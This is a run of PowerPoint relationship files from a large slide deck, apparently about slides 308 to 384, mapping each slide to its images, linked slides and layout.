<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image407.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image411.bmp"/><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410.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image409.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image408.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide308.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image417.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image412.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image416.png"/><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415.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image414.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image413.bmp"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.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420.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image419.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide311.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2.xml"/><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12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image424.bmp"/><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423.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image422.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image421.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide313.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide246.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32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14.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427.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image426.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide315.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide349.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide317.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide339.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.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slide" Target="slide333.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide245.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide328.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide364.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide321.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide356.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide316.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slide" Target="slide315.xm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31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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide318.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image433.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image429.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image432.pn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31.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image430.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image434.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide319.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slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image438.pn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37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image436.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image435.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422.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image441.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image440.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide322.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445.pn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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image443.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image442.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide323.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48.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image447.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image446.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide324.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452.pn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51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide325.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456.pn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55.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide326.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png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide327.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide329.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465.pn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64.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image463.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.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469.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide332.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image474.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image473.pn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3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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide334.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65.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image476.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image475.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide335.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide315.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image477.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide337.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79.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image478.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide338.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image484.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image483.pn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82.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image481.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33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2.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5.xml"/><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340.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488.pn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87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image486.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image485.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide341.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91.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image489.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide342.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94.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image493.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image492.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide343.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image499.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image498.pn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97.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image496.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image495.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide344.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image505.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image504.pn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503.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image502.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image501.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide345.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image507.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image506.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide347.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511.pn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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image508.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide348.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34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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></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350.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image513.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide351.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide315.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide353.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516.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image515.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image514.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide354.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482.pn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518.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image479.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image517.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide355.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519.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35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2.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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide357.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523.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image522.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image521.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide358.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527.pn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526.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image525.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image524.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide359.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image528.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36.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 Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide361.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image529.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image470.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide362.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533.bmp"/><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532.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image531.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide363.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image535.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image534.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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08.jpe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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide365.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image537.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image536.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide366.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 Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image539.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image538.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide367.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide315.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image540.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image468.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide36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27.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slide" Target="slide315.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide369.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image545.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image544.pn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543.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image542.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image541.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.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0.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image546.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide371.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slide" Target="slide376.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide375.xml"/><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slide" Target="slide245.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide383.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide375.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slide" Target="slide374.xm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37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2.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74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide377.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image548.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image549.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide378.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74.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image553.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image552.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image551.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide379.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468.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image467.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image466.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image554.png"/></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8.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 Target="slide422.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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27.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slide" Target="slide374.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide381.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558.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image557.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image556.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image555.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide382.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562.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image561.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image559.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38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2.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74.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide384.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566.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide374.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image565.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image564.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image563.bmp"/></Relationships>
</file>

